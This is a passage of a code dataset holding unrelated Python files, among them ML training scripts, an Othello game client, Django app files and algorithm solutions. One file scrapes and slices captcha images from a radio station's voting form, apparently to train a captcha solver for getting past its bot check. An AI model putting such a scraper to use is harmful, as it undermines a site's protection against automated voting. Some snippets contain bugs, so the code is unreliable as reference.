onClick)\r\nbtn.pack()\r\n\r\n\r\nwindow.mainloop()","sub_path":"python01_190330/test/dialogue.py","file_name":"dialogue.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"592593411","text":"import torchvision\nimport torchvision.datasets as tdatasets\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport torchvision.utils\nimport numpy as np\nimport random\nfrom PIL import Image\nimport torch\n#from dataset import SiameseNetworkDataset\nfrom trainsiamesedataset import SiameseNetworkDataset\nfrom FacesDataset import FacesDataset\nfrom testsiamesedataset import SiameseTestDataset\nfrom model import SiameseNetwork, ContrastiveLoss\nfrom torch import optim\nimport torch.nn.functional as F\nimport torch.nn as nn\n\ndef imshow(img,text=None,should_save=False):\n    npimg = img.numpy()\n    plt.axis(\"off\")\n    if text:\n        plt.text(75, 8, text, style='italic',fontweight='bold',\n        bbox={'facecolor':'white', 'alpha':0.8, 'pad':10})\n    plt.imshow(np.transpose(npimg, (1, 2, 0)))\n    plt.show()\n\ndef split_train_val(train):\n    examples = {}\n    for example in train:\n        data, label = example\n        if label.item() not in examples:\n            examples[label.item()] = []\n        examples[label.item()].append(example)\n\n    validation_size = 0.2\n    # for label in examples:\n    #     print(label, len(examples[label]))\n    train_80 = []\n    valid_20 = []\n    for label in examples:\n        sample_size = int(np.floor(0.2 * len(examples[label])))\n        choices = np.random.choice(len(examples[label]), sample_size, replace=False)\n        # print(len(choices), len(examples[label]), sample_size)\n        for choice in choices:\n            valid_20.append(examples[label][choice])\n        for i in range(len(examples[label])):\n            if not i in choices:\n                train_80.append(examples[label][i])\n\n\n\n    return train_80, valid_20\n\n\ndef main():\n    device = torch.device('cuda:9' if torch.cuda.is_available() else 'cpu')\n    train_dataset_dir = tdatasets.ImageFolder('images/all')\n    train_dataset = 
SiameseNetworkDataset(imageFolderDataset = train_dataset_dir, transform = transforms.Compose([transforms.Resize((100,100)), transforms.ToTensor()]))\n vis_dataloader = DataLoader(train_dataset,\n shuffle=False,\n num_workers=0,\n batch_size=10)\n\n # dataiter = iter(vis_dataloader)\n # example_batch = next(dataiter)\n # concatenated = torch.cat((example_batch[0],example_batch[1]),0)\n # imshow(torchvision.utils.make_grid(concatenated))\n # print(example_batch[2].numpy())\n #\n # example_batch = next(dataiter)\n # concatenated = torch.cat((example_batch[0], example_batch[1]), 0)\n # imshow(torchvision.utils.make_grid(concatenated))\n # print(example_batch[2].numpy())\n net = SiameseNetwork()\n criterion = ContrastiveLoss()\n optimizer = optim.Adam(net.parameters(),lr = 0.0005 )\n loss_vals = []\n '''\n Training Starts\n '''\n print('Training started')\n for epoch in range(10):\n loss_epoch = 0\n for i, data in enumerate(vis_dataloader,0):\n img_0, img_1, label = data\n print(i, label)\n # img_0, img_1, label = img_0.to(device), img_1.to(device), label.to(device)\n optimizer.zero_grad()\n out_0, out_1 = net(img_0, img_1)\n loss = criterion(out_0, out_1, label)\n loss_epoch += loss.item()\n loss.backward()\n optimizer.step()\n loss_vals.append(loss_epoch)\n print('Epoch',str(epoch+1), str(loss_epoch))\n print('Epoch done')\n torch.save(net.state_dict(), 'siamese.pt')\n print('Training completed')\n plt.plot(loss_vals)\n plt.savefig('loss_siamese.png')\n \n\n # ****************************** Training ends ***************************************\n\n\n '''\n Testing starts\n '''\n# net.load_state_dict(torch.load('siamese.pt'))\n# test_dataset = SiameseTestDataset(train_dataset_dir, \\\n# transform=transforms.Compose([transforms.Resize((100, 100)), transforms.ToTensor()]))\n# test_vis_dataloader = DataLoader(test_dataset,\n# shuffle=False,\n# num_workers=0,\n# batch_size=1)\n#\n# train_dataset_dir = tdatasets.ImageFolder('images/all')\n# train_dataset = FacesDataset(train_dataset_dir, \\\n# transform=transforms.Compose([transforms.Resize((100, 100)), transforms.ToTensor()]))\n#\n# _, test = split_train_val(train_dataset)\n# test_dataloader = DataLoader(test,\n# shuffle=False,\n# num_workers=0,\n# batch_size=1)\n# correct = 0\n# total = 0\n# for i, data in enumerate(test_dataloader, 0):\n# total += 1\n# img_1, labels = data\n# min_dist = float(\"inf\")\n# pred = -1\n# print('Testing begins', i)\n# for j, data_test_vis in enumerate(test_vis_dataloader, 0):\n# img_0 = data_test_vis\n# out_0, out_1 = net(img_0, img_1)\n# dist = F.pairwise_distance(out_0, out_1)\n# if min_dist > dist:\n# min_dist = dist\n# pred = j\n# if pred == labels.item():\n# correct += 1\n# print('Testing ends', i, pred)\n#\n# print('Accuracy: ',str(correct/total))\n#\n\n\n\n# test_dataset_dir = tdatasets.ImageFolder('images/test')\n # net.load_state_dict(torch.load('siamese.pt'))\n # test_dataset = SiameseNetworkDataset(imageFolderDataset = test_dataset_dir, transform = transforms.Compose([transforms.Resize((100,100)), transforms.ToTensor()]))\n\n# test_dataloader = DataLoader(test_dataset,\n# shuffle=True,\n# num_workers=2,\n# batch_size=1)\n# print('Testing starts')\n# correct = 0\n# total = 0\n# test_img_sub = None\n# for i, data in enumerate(test_dataloader, 0):\n# img_0, img_1, label = data\n# if test_img_sub is None:\n# test_img_sub = img_0\n# #concat = torch.cat((test_img_sub, img_1), 0)\n# concat = torch.cat((img_0, img_1), 0)\n# #test_img_sub, img_1, label = test_img_sub.to(device), img_1.to(device), label.to(device)\n# 
img_0, img_1, label = img_0.to(device), img_1.to(device), label.to(device)\n# out_0, out_1 = net(img_0, img_1)\n# dist = F.pairwise_distance(out_0, out_1)\n# if dist <= 0.5 and label == 0:\n# correct = correct + 1\n# elif label == 1:\n# correct = correct + 1\n# else:\n# pass\n# total = total + 1\n# #imshow(torchvision.utils.make_grid(concat),'Dissimilarity: {:.2f}'.format(dist.item()))\n# test_img_sub = test_img_sub.cpu()\n# # dist = dist.cpu().detach()\n# # print(dist.numpy())\n# # dist = torch.sigmoid(dist)\n# # print(dist.numpy())\n# print(correct/total)\n#\n#\n# print('Testing complete')\n\n\n\n #example_batch = next(dataiter)\n #concatenated = torch.cat((example_batch[0],example_batch[1]),0)\n # imshow(torchvision.utils.make_grid(concatenated))\n #print(example_batch[2].numpy())\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"siamese_run.py","file_name":"siamese_run.py","file_ext":"py","file_size_in_byte":7171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"400577326","text":"import argparse\nimport logging\nimport os\nimport sys\nimport time\n\nfrom torch.utils.data import DataLoader\n\nsys.path.append(\"..\")\nsys.path.append(\"../../\")\nfrom tqdm import tqdm\n\nfrom code_search.twin.twin_eval import get_eval_args\nfrom code_search.twin.twin_train import load_examples\n\nimport torch\nfrom transformers import BertConfig\nfrom common.models import TBertS\nfrom common.metrices import metrics\nfrom common.utils import MODEL_FNAME, results_to_df, format_batch_input_for_single_bert\n\n\ndef test(args, model, eval_examples, chunk_size=1000):\n if not os.path.isdir(args.output_dir):\n os.makedirs(args.output_dir)\n retr_res_path = os.path.join(args.output_dir, \"raw_result.csv\")\n cache_file = \"cached_single_test.dat\"\n if args.overwrite or not os.path.isfile(cache_file):\n chunked_retrivial_examples = eval_examples.get_chunked_retrivial_task_examples(\n chunk_query_num=args.chunk_query_num,\n chunk_size=chunk_size)\n torch.save(chunked_retrivial_examples, cache_file)\n else:\n chunked_retrivial_examples = torch.load(cache_file)\n retrival_dataloader = DataLoader(chunked_retrivial_examples, batch_size=args.per_gpu_eval_batch_size)\n\n res = []\n for batch in tqdm(retrival_dataloader, desc=\"retrival evaluation\"):\n nl_ids = batch[0]\n pl_ids = batch[1]\n labels = batch[2]\n with torch.no_grad():\n model.eval()\n inputs = format_batch_input_for_single_bert(batch, eval_examples, model)\n sim_score = model.get_sim_score(**inputs)\n for n, p, prd, lb in zip(nl_ids.tolist(), pl_ids.tolist(), sim_score, labels.tolist()):\n res.append((n, p, prd, lb))\n\n df = results_to_df(res)\n df.to_csv(retr_res_path)\n m = metrics(df, output_dir=args.output_dir)\n return m\n\n\nif __name__ == \"__main__\":\n args = get_eval_args()\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n res_file = os.path.join(args.output_dir, \"./raw_res.csv\")\n\n cache_dir = os.path.join(args.data_dir, \"cache\")\n cached_file = os.path.join(cache_dir, \"test_examples_cache.dat\".format())\n\n logging.basicConfig(level='INFO')\n logger = logging.getLogger(__name__)\n\n if not os.path.isdir(args.output_dir):\n os.makedirs(args.output_dir)\n\n model = TBertS(BertConfig(), args.code_bert)\n if args.model_path and os.path.exists(args.model_path):\n model_path = os.path.join(args.model_path, MODEL_FNAME)\n model.load_state_dict(torch.load(model_path))\n\n logger.info(\"model loaded\")\n start_time = 
time.time()\n test_examples = load_examples(args.data_dir, data_type=\"test\", model=model, overwrite=args.overwrite,\n num_limit=args.test_num)\n m = test(args, model, test_examples)\n exe_time = time.time() - start_time\n m.write_summary(exe_time)\n logger.info(\"finished test\")\n","sub_path":"code_search/single/single_eval.py","file_name":"single_eval.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"361361881","text":"from random import randint, choice\nimport math\nimport socketio\nfrom copy import deepcopy\nimport numpy as np\n\ntileRep = ['_', 'X', 'O'],\nN = 8\n\nred_flag = 0\n\nsio = socketio.Client()\n\npointBoard = [24, 3, 3, 3, 3, 3, 3, 24,\n 3, -12, -2, -2, -2, -2, -12, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -2, 1, 1, 1, 1, -2, 3,\n 3, -12, -2, -2, -2, -2, -12, 3,\n 24, 3, 3, 3, 3, 3, 3, 24]\n\n\ndef ix(row,col):\n print(row)\n print(col)\n print('abcdefgh'.index(col))\n return (row-1) * N + 'abcdefgh'.index(col)\n\ndef humanBoard(board):\n result = ' A B C D E F G H'\n for i in range(len(board)):\n print(\"i:{}\".format(i))\n if(i % N == 0):\n result += '\\n\\n' + str((int(math.floor(i / N)) + 1)) + ' '\n\n result += ' ' + str(tileRep[board[i % 2]]) + ' '\n print(result)\n return result\n\ndef validateHumanPosition(position):\n validated = len(position) == 2\n if(validated):\n row = int(position[0])\n col = position[1].lower()\n return (1 <= row and row <= N) and ('abcdefgh'.index(col) >= 0)\n return False\n\n##def max_value(position):\n## mv = float(\"-inf\")\n## for child in position:\n## value_eval = max_value(child)\n## mv = max(mv,value_eval)\n## return mv\n##\n##def min_value(position):\n## mv = float(\"inf\")\n## for child in position:\n## value_eval = min_value(child)\n## mv = min(mv,value_eval)\n## return mv\n##\n\ndef player1_score(board):\n player1total=board.count(1)\n return player1total\n\ndef player2_score(board):\n player2total=board.count(2)\n return player2total\n\n\ndef possible_moves(board,player):\n move_list = []\n for i in range(0,64):\n if board[i] == player:\n #moverse a la izquierda\n if i % 8 > 1:\n if board[i-1] != player and board[i-1] != 0:\n if(board[i-2] == 0):\n move_list.append(i-2)\n # moverse a la derecha\n if i % 8 < 6:\n if board[i+1] != player and board[i+1] !=0:\n if(board[i+2] == 0):\n move_list.append(i+2)\n #moverse hacia arriba\n if i > 15:\n if board[i-8] != player and board[i-8] !=0:\n if(board[i-16] == 0):\n move_list.append(i-16)\n #moverse hacia abajo\n if i < 48:\n if board[i+8] != player and board[i+8] !=0:\n if(board[i+16] == 0):\n move_list.append(i+16)\n return move_list\n\ndef inside_board(position):\n if position < 64 and position >= 0:\n return True\n else:\n return False\n\n#no es completamente correcto pero esta simplificado\ndef possible_moves_reworked(board,player):\n if player == 1:\n enemy = 2\n elif player ==2:\n enemy = 1\n move_list = []\n\n for i in range(0,64):\n if board[i] == enemy:\n # derecha\n if(inside_board(i+1) and board[i+1] == 0):\n move_list.append(i+1)\n # izquierda\n if(inside_board(i-1) and board[i-1] == 0):\n move_list.append(i-1)\n # arriba\n if (inside_board(i - 8) and board[i - 8] == 0):\n move_list.append(i-8)\n # abajo\n if (inside_board(i + 8) and board[i + 8] == 0):\n move_list.append(i + 8)\n\n return move_list\n\n\ndef enemy_moves(board, player):\n move_list = []\n\n for i in range(0, 64):\n if board[i] == player:\n # derecha\n 
if(inside_board(i+1) and board[i+1] == 0):\n move_list.append(i+1)\n # izquierda\n if(inside_board(i-1) and board[i-1] == 0):\n move_list.append(i-1)\n # arriba\n if (inside_board(i - 8) and board[i - 8] == 0):\n move_list.append(i-8)\n # abajo\n if (inside_board(i + 8) and board[i + 8] == 0):\n move_list.append(i + 8)\n return move_list\n\ndef create_all_moves(initial_board, current_player):\n current_player_moves = possible_moves_reworked(initial_board,current_player)\n next_moves = []\n for player_move in current_player_moves:\n next_board = deepcopy(initial_board)\n next_board[player_move] = current_player\n next_moves.append(next_board)\n return next_moves\n\n\ndef create_scores(next_moves,scoreboard):\n possible_scores = []\n print(\"next moves : {}\".format(next_moves))\n for move in next_moves:\n move_prime = np.array(move)\n scoreboard = np.array(scoreboard)\n calculate_score = (move_prime * scoreboard)\n calculate_score = calculate_score.sum()\n possible_scores.append(calculate_score)\n return possible_scores\n\n\n\ndef minimax(depth, nodeIndex, player, board, alpha, beta):\n if depth == 1:\n print(\"nodeIndex: {}\".format(nodeIndex))\n return board[nodeIndex]\n\n if player == 1:\n best = float(\"-inf\")\n for i in range(0,2):\n val = minimax(depth + 1, nodeIndex * 2 + i, 2, board, alpha, beta)\n best = max(best,val)\n alpha = max(alpha, best)\n if beta <= alpha:\n break\n return best\n\n else:\n best = float(\"inf\")\n for i in range(0,2):\n val = minimax(depth + 1, nodeIndex * 2 + i, 1, board, alpha, beta)\n best = min(best, val)\n beta = min(beta,best)\n if beta <= alpha:\n break\n return best\n\n@sio.on('connect')\ndef on_connect():\n print(\"Conectado: {}\".format(userName))\n sio.emit('signin',{ 'user_name': userName, 'tournament_id': tournamentID, 'user_role': 'player' })\n\n@sio.on('ready')\ndef on_ready(data):\n global red_flag\n row_generator = []\n full_board = []\n print(\"About to move. 
Board:\\n\")\n print('player_turn: {}'.format(data['player_turn_id']))\n print(data['board'])\n print(\"score: {}\".format(player1_score(data['board'])))\n #for i in range(len(data['board'])):\n # if(i % 8 == 0 and i!=0 ):\n # print(\"\\n\")\n #print(data['board'],end=\"\")\n #print(\"\\n\")\n \n #movement = \"\"\n list_of_cols = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n list_of_cols1 = ['C', 'D', 'E','F']\n \n #movement = randint(0,63)\n\n #calcular todas las jugadas\n all_moves = create_all_moves(data['board'],data['player_turn_id'])\n \n scores = create_scores(all_moves, pointBoard)\n\n print(\"scores: {}\".format(scores))\n\n if(len(scores) > 1):\n alpha_beta = minimax(0, 0, data['player_turn_id'], scores, float(\"-inf\"), float(\"inf\"))\n wheretomove = scores.index(alpha_beta)\n else:\n #solo 1 jugada\n wheretomove = 0\n\n #if red_flag == wheretomove:\n #print(\"hello there general kenobi\")\n #dont pick this\n # scores[wheretomove] = float(\"inf\")\n # alpha_beta = minimax(0, 0, data['player_turn_id'], scores, float(\"-inf\"), float(\"inf\")) \n # wheretomove = scores.index(alpha_beta)\n\n #print(\"red_flag: {0}, wheretomove: {1}\".format(red_flag,wheretomove))\n #red_flag = wheretomove\n \n #wheretomove = scores.index(scores.choice())\n \n\n playerwillmove = possible_moves_reworked(data['board'],data['player_turn_id'])\n\n if(playerwillmove):\n print(\"wheretomove: {}\".format(wheretomove))\n movement = playerwillmove[wheretomove]\n else:\n movement = randint(0,64)\n \n if red_flag == wheretomove:\n print(\"hello there general kenobi\")\n if(playerwillmove):\n movement = choice(playerwillmove)\n else:\n movement = randint(0,64)\n \n\n print(\"red_flag: {0}, wheretomove: {1}\".format(red_flag,wheretomove))\n red_flag = wheretomove\n \n\n #pop si no es una movida que se pueda realizar\n #scores.pop(wheretomove)\n\n print(\"movement: {}\".format(movement))\n #while(not(validateHumanPosition(movement))):\n # movement = str(randint(3,6)) + choice(list_of_cols1)\n \n\n sio.emit('play', {'player_turn_id': data['player_turn_id'], 'tournament_id': tournamentID, 'game_id': data['game_id'], 'movement': movement} )\n\n@sio.on('finish')\ndef on_finish(data):\n print(\"Game {} has finished\".format(data['game_id']))\n print(\"ready to play again\")\n\n sio.emit('player_ready', {'tournament_id': tournamentID, 'game_id': data['game_id'], 'player_turn_id': data['player_turn_id'] })\n\n\n#sio.connect('http://192.168.88.253:4000')\n#sio.connect('http://192.168.1.127:4000')\nsio.connect('http://localhost:4000')\nuserName = 'Cristian' \ntournamentID = 142857\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198517622","text":"from bisect import bisect_right\nimport sys\ninput = sys.stdin.buffer.readline\n\nclass BIT:\n def __init__(self, size):\n self.size = size\n self.tree = [0] * (size + 1)\n\n def add(self, index):\n while index <= self.size:\n self.tree[index] += 1\n index += index & (-index)\n\n def sum(self, index):\n ret = 0\n while index:\n ret += self.tree[index]\n index -= index & (-index)\n return ret\n\n def search(self, value):\n i = 0\n s = 0\n step = 1 << (self.size.bit_length() - 1)\n while step:\n if i + step <= self.size and s + self.tree[i + step] < value:\n i += step\n s += self.tree[i]\n step //= 2\n return i + 1\n\nN, K = map(int, input().split())\nA = [int(input()) - K for _ in range(N)]\n\naccA = [0] * (N + 1)\nfor i, a in 
enumerate(A, start=1):\n accA[i] = accA[i - 1] + a\n\nsToI = {s: i for i, s in enumerate(sorted(list(set(accA))))}\ntree = BIT(len(sToI))\n\nans = 0\nfor a in map(lambda a: sToI[a] + 1 ,accA):\n ans += tree.sum(a)\n tree.add(a)\nprint(ans)\n","sub_path":"AtCoder/arc/075e.py","file_name":"075e.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"287277054","text":"import pyscreenshot as ImageGrab\nimport time\nfrom selenium import webdriver\nimport image_slicer\nfrom PIL import Image\n\n\nloops = 100\ncount = 0\n\ndef collect(loops):\n\n\n pref = loops\n\n options = webdriver.FirefoxOptions()\n options.add_argument(\"--start-maximized\")\n\n\n\n driver = webdriver.Firefox(firefox_options=options)\n driver.get(\"https://www.rtvutrecht.nl/formulier/top100/\")\n driver.maximize_window()\n driver.execute_script(\"window.scrollTo(0, 500)\")\n\n\n time.sleep(1)\n\n bound_laptop = \"nothing\"\n bound_desktop = (2337,520,2385,538)\n\n im = ImageGrab.grab(bbox=(661,487,709,505)).convert('RGB')\n\n im.save(\"captcha_full.png\")\n bg = Image.open(\"bg.png\").convert('LA')\n\n\n for x in range (1,7):\n x_bound = (x-1) * 8\n\n crop = im.crop((x_bound,0,x_bound + 8,18))\n name = \"slice_\" + str(loops) + str(x) + \".png\"\n print(name)\n\n back_im = bg.copy()\n back_im.paste(crop, (10,5))\n back_im.save(\"collected/\" + name)\n\n\n driver.close()\n\n\nwhile count <= loops:\n collect(count)\n count += 1\n","sub_path":"data/training_data/raw2/captcha_collector.py","file_name":"captcha_collector.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"116634823","text":"from django.contrib import admin\nfrom .models import Artist, Song, Pick, Comment, Boi\n\n\nclass ArtistInline(admin.TabularInline):\n model = Song\n extra = 0\n show_change_link = True\n\nclass ArtistAdmin(admin.ModelAdmin):\n # fieldsets = [\n # (None, {'fields': ['question_text']}),\n # ('Date information', {'fields': ['pub_date'], 'classes': ['collapse']}),\n # ]\n inlines = [ArtistInline]\n list_select_related = True\n\n\nclass SongInline(admin.TabularInline):\n model = Pick\n extra = 0\n show_change_link = True\n\nclass SongAdmin(admin.ModelAdmin):\n # fieldsets = [\n # (None, {'fields': ['question_text']}),\n # ('Date information', {'fields': ['pub_date'], 'classes': ['collapse']}),\n # ]\n list_filter = ('artist__full_name',)\n inlines = [SongInline]\n\nadmin.site.register(Artist, ArtistAdmin)\nadmin.site.register(Song, SongAdmin)\nadmin.site.register(Pick)\nadmin.site.register(Comment)\nadmin.site.register(Boi)\n","sub_path":"akkordbase/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"144007085","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isValidBST(self, root):\n if root==None: return True\n self.last = None\n self.validate = True\n\n self.in_order(root)\n\n return self.validate\n\n def in_order(self, node):\n if not self.validate: return\n\n if node.left!=None:\n self.in_order(node.left)\n\n if self.last!=None and node.val<=self.last.val:\n self.validate=False\n return\n\n self.last=None\n\n if node.right!=None:\n 
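This validator threads self.last through an in-order walk; below is a self-contained sketch of the same idea with an explicit previous-value cell. Note the walk has to remember the node it just visited, rather than resetting it, for the ordering check to catch violations later in the traversal:

def is_valid_bst(root):
    prev = [None]  # value of the node most recently visited in-order

    def walk(node):
        if node is None:
            return True
        if not walk(node.left):
            return False
        if prev[0] is not None and node.val <= prev[0]:
            return False
        prev[0] = node.val  # remember this node before descending right
        return walk(node.right)

    return walk(root)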
self.in_order(node.right)\n","sub_path":"Leetcode/Validate_Binary_Search_Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"255700054","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('solutions', '0003_solution_solution_type'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='solutionmedia',\n options={'ordering': ('order', 'id')},\n ),\n migrations.AlterField(\n model_name='solution',\n name='title',\n field=models.CharField(help_text=b'Public facing title that goes on cube.', max_length=255, null=True, blank=True),\n ),\n ]\n","sub_path":"solutions/migrations/0004_auto_20151123_2033.py","file_name":"0004_auto_20151123_2033.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456721449","text":"'''\nCreated on 14.08.2012\n\n@author: apollov\n'''\nimport datetime\nfrom datetime import date\nfrom django.views.generic import TemplateView\nfrom django.shortcuts import redirect\nfrom apps.galleries.models import ImageGallery, VideoGallery, IndexSlider\nfrom apps.promoblock.models import Promoblock\nfrom apps.calendarworks.models import Calendarwork, Day\nfrom apps.catalogues.models import PrimaryProduct, Category\nfrom apps.news.models import Article\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom apps.news.forms import SubscriberForm\nfrom apps.faq.forms import FaqForm\n\n\nclass MainView(TemplateView):\n template_name = 'phart/main.html'\n\n def dispatch(self, *args, **kwargs):\n # check if there is some video onsite\n if args[0].LANGUAGE_CODE != 'ru':\n return redirect('/{lang}/about/about/'.format(lang=args[0].LANGUAGE_CODE))\n else:\n return super(MainView, self).dispatch(args[0], *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n today = datetime.datetime.now()\n try: \n day = Day.objects.get(date=date.today)\n except ObjectDoesNotExist:\n day = None \n return {\n 'day': day,\n 'categories': Category.objects.filter(published=True).order_by('sorting_order'),\n 'products': PrimaryProduct.objects.filter(published=True),\n 'month': Calendarwork.objects.get(month=today.strftime('%m')),\n 'promoblock': Promoblock.objects.get(type=1),\n 'articles': Article.objects.filter(is_shown_on_main_page=True).order_by('-date_time')[:2],\n 'main': 1,\n 'video_gallery': VideoGallery.objects.filter(gallery_type=3)[0],\n 'image_gallery': ImageGallery.objects.prefetch_related('image_set').filter(gallery_type=2)[0] if ImageGallery.objects.exists() else None,\n 'image_gallery_videos': VideoGallery.objects.prefetch_related('video_set').filter(gallery_type=5)[0] if VideoGallery.objects.exists() else None,\n 'image_slider': IndexSlider.objects.order_by('sorting_order'),\n 'form': FaqForm()\n }\n\nmain_view = MainView.as_view()\n","sub_path":"phart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"161249324","text":"import os\nimport re\nimport csv\nimport argparse\n\n\n# Complete path function\nclass CompletePath(argparse.Action):\n\t\"\"\"give the full path of an input file/folder\"\"\"\n\tdef __call__(self, parser, namespace, values, option_string=None):\n\t\tsetattr(namespace, self.dest, 
os.path.abspath(os.path.expanduser(values)))\n\n\ndef get_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"Get the distance to center of each extracted SNP\",\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter\n\t)\n\tparser.add_argument(\n\t\t\"--logfile\",\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\thelp=\"The screen output from the SNP extraction script as a text file\"\n\t)\n\tparser.add_argument(\n\t\t\"--length_info\",\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\thelp=\"supply a file that contains the locus name and the length of the locus (each in a separate line) for all alignments of interest\"\n\t)\n\tparser.add_argument(\n\t\t\"--output\",\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\thelp=\"where to store the results (dir)\"\n\t)\n\tparser.add_argument(\n\t\t'--multi_snp',\n\t\taction='store_true',\n\t\tdefault=False,\n\t\thelp='Use this flag if you extracted all snps (not only one per locus)'\n\t)\n\treturn parser.parse_args()\n\nargs = get_args()\nsnp_logfile = args.logfile\nlength_log = args.length_info\noutdir = args.output\n\n\n# get extracted positions\n\nlogfile = open(snp_logfile,'r')\nalignments = []\nextracted_positions = []\nif args.multi_snp:\n\tfor line in logfile:\n\t\tif line.startswith('processing file:'):\n\t\t\talignment = line.split(':')[1]\n\t\t\talignment = re.sub('\\s+', '', alignment)\n\t\t\talignments.append(alignment)\n\t\telif line.startswith(\"['\"):\n\t\t\tpass\n\t\telif line.startswith(\"[]\"):\n\t\t\tpass\n\t\telif line.startswith(\"[\"): \n\t\t\tline = line.rstrip()\n\t\t\tpos = re.sub('[\\[\\]]','',line)\n\t\t\textracted_positions.append(pos)\n\t\telif line.startswith('no SNP extraction performed'):\n\t\t\tpos = 'NA'\n\t\t\textracted_positions.append(pos)\nelse:\t\n\tfor line in logfile:\n\t\tif line.startswith('processing file:'):\n\t\t\talignment = line.split(':')[1]\n\t\t\talignment = re.sub('\\s+', '', alignment)\n\t\t\talignments.append(alignment)\n\t\telif line.startswith('sampling position'):\n\t\t\tpos = line.split(' ')[-1]\n\t\t\tpos = pos.rstrip()\n\t\t\textracted_positions.append(pos)\n\t\telif line.startswith('no SNP extraction performed'):\n\t\t\tpos = 'NA'\n\t\t\textracted_positions.append(pos)\n#make a dicitonary from the two lists\nal_pos_dict = {}\nfor al in alignments:\n\tindex = alignments.index(al)\n\tal_pos_dict.setdefault(al,extracted_positions[index])\n\n\n\n# get alignment lengths\n\nlengthfile = open(length_log,'r')\nl_alignments = []\nlength_list = []\nfor line in lengthfile:\n\tif line.startswith('uce-'):\n\t\tl_alignments.append(line.rstrip())\n\telse:\n\t\tlength_list.append(line.rstrip())\n#make a dicitonary form the two lists\nal_length_dict = {}\nfor al in l_alignments:\n\tindex = l_alignments.index(al)\n\tal_length_dict.setdefault(al,length_list[index])\n\n\n\n# now calculate the distance to the center for each variable position\ndist_count_dict = {}\nfor al in al_length_dict:\n\tlength = al_length_dict[al]\n\textracted = al_pos_dict[al]\n\tcenter = int(length)/2\n\tvar_pos_list = al_pos_dict[al].split(', ')\n\tfor pos in var_pos_list:\n\t\tdist = ''\n\t\tif not pos == 'NA':\n\t\t\tpos = int(pos)\n\t\t\tif pos > center:\n\t\t\t\tdist = pos-center\n\t\t\telif pos < center:\n\t\t\t\tdist = center-pos\n\t\t\telse:\n\t\t\t\tdist = 0\n\t\telse:\n\t\t\tcontinue\n\t\tif dist in dist_count_dict:\n\t\t\tdist_count_dict[dist] += 1\n\t\telse:\n\t\t\tdist_count_dict.setdefault(dist,1)\n\ndist_count = open(\"%s/distance_to_center_count.txt\" %outdir, 
\"wb\")\ndist_count_log=csv.writer(dist_count, delimiter='\\t')\nfor key in dist_count_dict:\n\tdist_count_log.writerow([key,dist_count_dict[key]])\n#input file = log file from snp extraction script\n#alignment-varpos-dict = transform file into dict, with name of locus as key and extracted variable positions as value(s)\n#alignment-length-dict = transform file into dict, every first line is key and every second is value\n#distance_to_center-count-dict = {}\n#for alignment, length in alignment-lenth-dict:\n#\tcenter = length/2\n#\tvarpos = alignment-varpos-dict[alignment]\n# \tfor position in varpos:\n#\t\tdist = ''\n#\t\tif position > center:\n#\t\t\tdist = position - center\n# \t\telif position < center: \n#\t\t\tdist = center-position\n# \t\telse:\n#\t\t\tdist = 0\n#\t\tif dist in distance_to_center-count-dict:\n#\t\t\tdistance_to_center-count-dict[dist] +1\n#\t\telse:\n#\t\t\tdistance_to_center-count-dict.setfault(dist,1)\n# write distance_to_center-count-dict into tab delimited file\n# key /t value","sub_path":"summary_stats/snps/bin/get_snp_stats.py","file_name":"get_snp_stats.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105851765","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# 高阶函数\n# 高阶函数至少要符合以下两个特点之一\n# 接受一个或者多个函数作为参数\n# 将函数作为返回值返回\n\n\n# 匿名函数\n# 语法 lambda 参数列表: 返回值\ndef fn(x):\n return x\n\n\n# 等价于 fn = lambda x: x\n\n\n# filter() 函数\n# 过滤掉不符合条件的元素,返回一个迭代器对象\n# 参数:\n# 1.函数\n# 